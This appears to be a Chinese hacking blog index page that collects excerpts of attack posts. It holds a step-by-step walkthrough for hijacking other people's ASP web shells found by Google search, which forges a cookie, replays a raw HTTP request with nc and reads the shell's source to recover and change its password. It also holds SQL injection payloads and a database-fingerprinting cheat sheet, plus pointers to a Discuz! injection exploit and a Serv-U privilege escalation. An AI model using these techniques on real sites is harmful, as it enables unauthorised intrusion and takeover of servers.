信息来源:h4x0r's blog

前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL 后面就是SQL语句啦

返回信息：
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'shi'' 之前有未闭合的引号。
/region.asp，行 32

针对mssql的
NBSI 直接列目录 >备份> ok!

---------------------------------------------------------------------------
discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dorks: "powered by discuz! 5.0.0
"powered by discuz!
---------------------------------------------------------------------------

» 阅读全文

发布日期：2006-10-21
漏洞发现：Bug.Center.Team

在NewComment.asp文件中

ModuleName = Trim(request("ModuleName"))

这个ModuleName变量没过滤好，从而导致，我们可以在下面的SQL语句中构造我们的
SQL语句

» 阅读全文

思路是通过提交的COOKIE来查看木马的原代码，找出密码
看下面的代码
if trim(request.form("password"))=kiki then
response.cookies("password")="allen" <|>密码是否正确
response.redirect ""&url&""
else if Request.Cookies("password")<>"allen" then
call login() <|>密码错误
response.end <|>停止运行
注意：response.cookies("password")="allen"
他没有要求SESSION认证，仅仅要求COOKIES里的PASSWORD的值是allen。这就是说我门可以通过COOKIES欺骗来达到进入木马的目的，然后找到其密码。
还是实战一次：
1 找到一个后门，呵呵，不是我的，
在google里查找"一次只能执行一个操作:)在本页操作" 这是XP。NET版的标志文字，你也可以换成别的，注意一定要加引号，表示不拆分字符串查询。
这样就找到了许多，呵呵，我选了一个，路径http://ip/images/globla.asp
2 在自己的计算机得到完好的COOKIE信息
我自己的木马http://ip/pic/xp.asp
用到一个工具winsock expert
登陆到自己的ASP木马，然后找到自己木马的路径，停！打开winsock expert选择监视对应的IE，然后回到IE点编辑，此时，IE显示出你的木马的原代码了，转到winsock expert 在前几行有一个用get 方法给你的木马的数据，我的是
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/pic.asp
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
看到password=allen了么？这是ASP木马认证你是否登陆了方法。现在很简单了
把 数 据中所有的 ip 和路径改为别人的木马路径。还要将
GET /pic/globla.asp?id=edit&path=/pic/xp.asp&attrib= HTTP/1.1
中的PATH=后的值改为别人的木马路径。
我找的木马http://ip/images/globla.asp
所以我改后的数据是
GET /images/globla.asp?id=edit&path=/images/globla.asp&attrib= HTTP/1.1
Accept: */*
Referer:http://202.202.202.202/ima...
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)
Host: 202.202.202.202
Connection: Keep-Alive
Cookie: ASPSESSIONIDQQQQGIOU=LKBFFJEANEJIGNMKDJEIKNNI; password=allen
好了，保存在文本。
3 提交我们的数据
进入命令行，进入NC的目录,键入命令
nc -vv 202.202.202.202 80 >1.txt
>1.txt 表示将返回的信息保存在同目录的1.txt
一定要在CMD下键入命令，直接打开NC无法保存数据
呆会会提示连接成功，然后我门将作好的COOKIE粘贴在里面，然后按两次回车。
实际这时我门就通过了他的 验证并请求木马的原代码。
然后在同目录下1.txt就看到了木马的原代码，

<|>修改下面的kiki改为你密码
if trim(request.form("password"))=kiki then
哈哈，看到密码了，然后登陆吧，再改了密码，这个木马就是你的了。

【前言】

本文主要介绍跨站脚本执行漏洞的成因，形式，危害，利用方式，隐藏技巧，解决方法和常见问题 （FAQ），由于目前介绍跨站脚本执行漏洞的资料还不是很多，而且一般也不是很详细，所以希望本文能够 比较详细的介绍该漏洞。由于时间仓促，水平有限，本文可能有不少错误，希望大家不吝赐教。

声明，请不要利用本文介绍的任何内容，代码或方法进行破坏，否则一切后果自负！

【漏洞成因】
原因很简单，就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。

» 阅读全文

文章作者：kon-bluesky
不知道这个漏洞以前是不是有过.不过即然我发现了.我就发表出来.跟大家一起学习下.
利用的是动网的一个银行插件漏洞.如果是SQL版本的.并且用了这个插件.成功率很高.
下面我就这个漏洞来详细的说明一个.文章所利用的网站.希望大家不要再破坏了

» 阅读全文

Author：lake2 ( http://lake2.0x54.org )

最近的生活真无聊，寒冰掌老大见我无所事事，就说如果我能把serv-u本地提权的ASP程序做出来就给介绍个MM，所以呢，就有了这篇文章^_^

serv-u本地提权的问题很古老了，不清楚的朋友谷歌一下先，我就不罗嗦啦。呵呵，最主要的是相继出现了php、perl、aspx版本的提权脚本，一时间刀光剑影满天飞，惟独缺了ASP版的。主要是由于郁闷的ASP不能像其他脚本那样访问Socket（另一个原因是因为老大没早点对我用美眉计^_^）。

» 阅读全文

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符'and [查询条件] and ''='

4.搜索时没过滤参数的'and [查询条件] and '%25'='

5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

» 阅读全文